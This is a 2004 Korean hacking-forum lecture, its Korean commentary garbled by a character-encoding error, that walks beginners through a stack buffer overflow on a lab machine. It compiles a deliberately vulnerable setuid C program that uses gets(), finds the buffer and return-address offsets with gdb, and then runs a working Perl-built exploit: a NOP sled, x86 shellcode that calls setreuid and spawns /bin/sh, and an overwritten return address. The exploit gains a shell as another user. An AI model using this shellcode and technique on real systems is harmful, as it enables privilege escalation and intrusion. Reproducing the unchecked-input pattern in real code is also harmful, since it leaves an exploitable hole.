http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Lectures&no=181 [º¹»ç]
Produced by ganseo
e-mail : postmaster@ganseo.com
homepage : http://www.ganseo.com
¾Æ·¡ ¹®¼¿¡¼ ÁÖ¼®Ã³¸®µÈ ºÎºÐÀÌ ¼³¸íÀÔ´Ï´Ù.
Ãʺ¸ÀÚµéÀÌ ½±°Ô µû¶ó ÇÒ ¼ö ÀÖµµ·Ï Çѹø ¸¸µé¾î ºÃ½À´Ï´Ù.
Á¦ ¿ö°ÔÀÓ ¼¹ö¿¡¼ Å×½ºÆ® ÇغýÀ´Ï´Ù.
µÎ°¡Áö ¹öÁ¯À¸·Î ÁغñÇØ ºÃ½À´Ï´Ù.
Á÷Á¢ ¹öÆÛ¿¡ ½©Äڵ带 Áý¾î³Ö°í ÇÏ´Â ¹æ¹ý°ú egg ÇÁ·Î±×·¥À» ÀÌ¿ëÇÏ´Â ¹æ¹ýÀÔ´Ï´Ù.
gcc ¹öÁ¯ Á¤º¸ÀÔ´Ï´Ù.
[root@localhost .test]# gcc -v
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/2.96/specs
gcc version 2.96 20000731 (HancomLinux 2.2 2.96-99hl)
[root@localhost /]# mkdir .test
[root@localhost /]# cd .test
//test ȯ°æÀ» ¸¸µé¾î º¸°Ú½À´Ï´Ù. ¾²Áö ¸»¾Æ¾ßÇÒ getsÇÔ¼ö¸¦ ½è½À´Ï´Ù.^^
[root@localhost .test]# cat > testApp.c
#include <stdio.h>
void main(int argc , char** argv)
{
char buffer[200];
printf("type ur words : ");
gets(buffer);
printf("words = %s\n" , buffer);
}
[root@localhost .test]# gcc -o testApp testApp.c
testApp.c: In function `main':
testApp.c:3: warning: return type of `main' is not `int'
/tmp/ccFrX0ch.o: In function `main':
/tmp/ccFrX0ch.o(.text+0x24): the `gets' function is dangerous and should not be used.
[root@localhost .test]# chmod 4750 testApp
[root@localhost .test]# chown recluse8 testApp
[root@localhost .test]# chgrp recluse7 testApp
[root@localhost .test]# ls -al
ÇÕ°è 28
drwxr-xr-x 2 root root 4096 4¿ù 10 00:08 .
drwxr-xr-x 21 root root 4096 4¿ù 9 23:17 ..
-rwsr-x--- 1 recluse8 recluse7 13842 4¿ù 10 00:08 testApp
-rw-r--r-- 1 root root 155 4¿ù 10 00:08 testApp.c
[root@localhost .test]#
//ÇÁ·Î±×·¥À» ÆÞÀ» °¡Áö°í ½ÇÇèÇغ¸¾Ò½À´Ï´Ù.
[root@localhost .test]# (perl -e 'print "A"x300';cat)|./testApp
type ur words : words = AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
¼¼±×¸àÅ×ÀÌ¼Ç ¿À·ù
[root@localhost .test]#
//¼¼±×¸àÅ×ÀÌ¼Ç ¿À·ù°¡ ³ª´Â°É º¸´Ï bof°¡ ÀϾ´Ï´Ù.
/*
*ù¹ø° ¹æ¹ýÀÔ´Ï´Ù.
*ÀÏ´Ü gdb·Î disassemble Çؼ ¿ì¸®°¡ ³ÖÀ» ¹öÆÛÀÇ ÁÖ¼Ò¿Í ret address°¡ µé¾î°¥ ºÎºÐÀ» ¾Ë¾Æº¸µµ·Ï ÇÏ°Ú½À´Ï´Ù.
*ÁÖº¯ Áö½ÄÀº ganseo.comÀÇ ¹®¼¸¦ ÂüÁ¶Çϼ¼¿ä.
*¾ÕÀ¸·Î ¿ì¸®´Â A·Î ü¿ü´ø ºÎºÐ¿¡ ¿ì¸®ÀÇ ½©Äڵ带 ³ÖÀ»Å×°í mainÇÔ¼öÀÇ ret addressºÎºÐ¿¡
*¿ì¸®°¡ ³ÖÀº ½©ÄÚµåÀÇ ÁÖ¼Ò¸¦ ³Ö¾îÁÙ ¿¹Á¤ÀÔ´Ï´Ù.^^
*/
[root@localhost .test]# gdb -q testApp
(gdb) disass main
Dump of assembler code for function main:
0x8048490 <main>: push %ebp
0x8048491 <main+1>: mov %esp,%ebp
0x8048493 <main+3>: sub $0xd8,%esp
//buf¸¦ ÄÄÆÄÀÏ·¯°¡ dummy¿Í ÇÔ²² À̸¸Å Àâ´Â´Ù. 10Áø¼ö·Î 216
//±×·¯¸é ¾ÕÀ¸·Î ã¾Æº¼ ebp - 0xd8À» ÇÑ°÷¿¡ ÀԷ¹ÞÀº °ªÀÌ µé¾î°¥ °ÍÀÌ¶ó ¿¹»óÇÒ¼ö ÀÖ´Ù.
0x8048499 <main+9>: sub $0xc,%esp
0x804849c <main+12>: push $0x8048548
0x80484a1 <main+17>: call 0x804836c <printf>
0x80484a6 <main+22>: add $0x10,%esp
0x80484a9 <main+25>: sub $0xc,%esp
0x80484ac <main+28>: lea 0xffffff28(%ebp),%eax
0x80484b2 <main+34>: push %eax
0x80484b3 <main+35>: call 0x804833c <gets>
0x80484b8 <main+40>: add $0x10,%esp
0x80484bb <main+43>: sub $0x8,%esp
0x80484be <main+46>: lea 0xffffff28(%ebp),%eax
0x80484c4 <main+52>: push %eax
0x80484c5 <main+53>: push $0x8048559
0x80484ca <main+58>: call 0x804836c <printf>
0x80484cf <main+63>: add $0x10,%esp
0x80484d2 <main+66>: leave
0x80484d3 <main+67>: ret
0x80484d4 <main+68>: nop
0x80484d5 <main+69>: nop
0x80484d6 <main+70>: nop
0x80484d7 <main+71>: nop
0x80484d8 <main+72>: nop
0x80484d9 <main+73>: nop
0x80484da <main+74>: nop
0x80484db <main+75>: nop
0x80484dc <main+76>: nop
0x80484dd <main+77>: nop
0x80484de <main+78>: nop
0x80484df <main+79>: nop
End of assembler dump.
(gdb)
//ebp¸¦ ã¾Æ¼ ret address°¡ ¾îµðÀÖ´ÂÁö ÃßÃøÇغ¸ÀÚ.
(gdb) b *(main+3)
0x08048493 in main ()
(gdb) info reg
eax 0x40158ac0 1075153600
ecx 0x0 0
edx 0x0 0
ebx 0x40159fd0 1075158992
esp 0xbffffab8 0xbffffab8
ebp 0xbffffab8 0xbffffab8 //¿©±â°¡ ebp´Ù. ±×·¸´Ù¸é ebp + 4 ºÎºÐ¿¡ ¿ì¸®°¡ ¸¸µé ½©ÄÚµåÀÇ address¸¦ ³Ö¾îÁÖ¸é µÇ°Ú´Ù.
esi 0x40015e4c 1073831500
edi 0xbffffb24 -1073743068
eip 0x8048493 0x8048493
eflags 0x396 918
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x0 0
fctrl 0x37f 895
fstat 0x0 0
ftag 0xffff 65535
fiseg 0x23 35
fioff 0x400458fe 1074026750
foseg 0x2b 43
fooff 0x808fc74 134806644
fop 0x2e9 745
xmm0 0x00000000000000000000000000000000
xmm1 0x00000000000000000000000000000000
xmm2 0x00000000000000000000000000000000
xmm3 0x00000000000000000000000000000000
xmm4 0x00000000000000000000000000000000
xmm5 0x00000000000000000000000000000000
xmm6 0x00000000000000000000000000000000
xmm7 0x00000000000000000000000000000000
mxcsr 0x1f80 8064
(gdb)
(gdb) b *(main+58)
Breakpoint 1 at 0x80484ca
(gdb) r
Starting program: /.test/testApp
type ur words : AAAAAAAAAAAAAAA
Breakpoint 1, 0x080484ca in main ()
(gdb)
(gdb) x/100bx 0xbffff9e0
(gdb) x/100bx 0xbffff9d0
0xbffff9d0: 0x59 0x85 0x04 0x08 0xe0 0xf9 0xff 0xbf
0xbffff9d8: 0x74 0x61 0xdf 0x03 0xa0 0xfa 0xff 0xbf
0xbffff9e0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 //ÃßÃøÇÑ´ë·Î ebp - 0xd8ºÎºÐ¿¡ A(0x41)ÀÌ µé¾î°¡ÀÖ´Ù.
0xbffff9e8: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x00
0xbffff9f0: 0xfc 0x1b 0x03 0x40 0xe0 0x63 0x01 0x40
0xbffff9f8: 0x01 0x00 0x00 0x00 0xa0 0x81 0x04 0x08
0xbffffa00: 0x94 0x60 0x01 0x40 0x8e 0xff 0x77 0x01
0xbffffa08: 0x8e 0xff 0x77 0x01 0xd0 0xfa 0xff 0xbf
0xbffffa10: 0xf8 0x5e 0x01 0x40 0x4c 0x82 0x04 0x08
0xbffffa18: 0x10 0x69 0x69 0x0d 0x5c 0xfa 0xff 0xbf
0xbffffa20: 0xec 0x46 0x03 0x40 0xe0 0x63 0x01 0x40
0xbffffa28: 0xc0 0x66 0x01 0x40 0x01 0x00 0x00 0x00
0xbffffa30: 0x00 0x00 0x00 0x00
(gdb)
//ÀÌÁ¦ ¿ì¸®°¡ ³ÖÀ» ½©ÄÚµåÀÇ ÁÖ¼Òµµ ¾Ë¾Æ³Â°í ½©ÄÚµå ÁÖ¼Ò°¡ µé¾î°¡¾ßÇÒ ºÎºÐÀÇ ÁÖ¼Òµµ ¾Ë¾Æ³ÂÀ¸´Ï
//°£´ÜÇÑ ÆÞ½ºÅ©¸³Æ®¸¦ ¸¸µé¾îº¸ÀÚ. ½©ÄÚµå´Â ¹®¼¸¦ ÂüÁ¶ÇϽñæ...
[root@localhost .test]# id recluse8
uid=1008(recluse8) gid=1008(recluse8) groups=1008(recluse8)
//½©ÄÚµå byte 63
//mainÀÇ return address ±îÁöÀÇ byte 216 + 4 = 220
[root@localhost .test]# su recluse7
[recluse7@localhost .test]$ (perl -e 'print "\x90"x156';perl -e 'print "\x31\xc9\x66\xb9\xf0\x03\x31\xdb\x66\xbb\xf0\x03\x31\xc0\xb0\x46\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh\x00"';perl -e 'print "\xe0\xf9\xff\xbf"';cat)|./testApp
type ur words : words = 1?¹ð1?»ð1À°FÍë^1ÀFF V
?N?ÛØ@Íè?ÿÿ/bin/sh
?
id
uid=1008(recluse8) gid=1007(recluse7) groups=1007(recluse7)
¼º°øÇß½À´Ï´Ù.
|
Hit : 15576 Date : 2004/04/12 02:01
|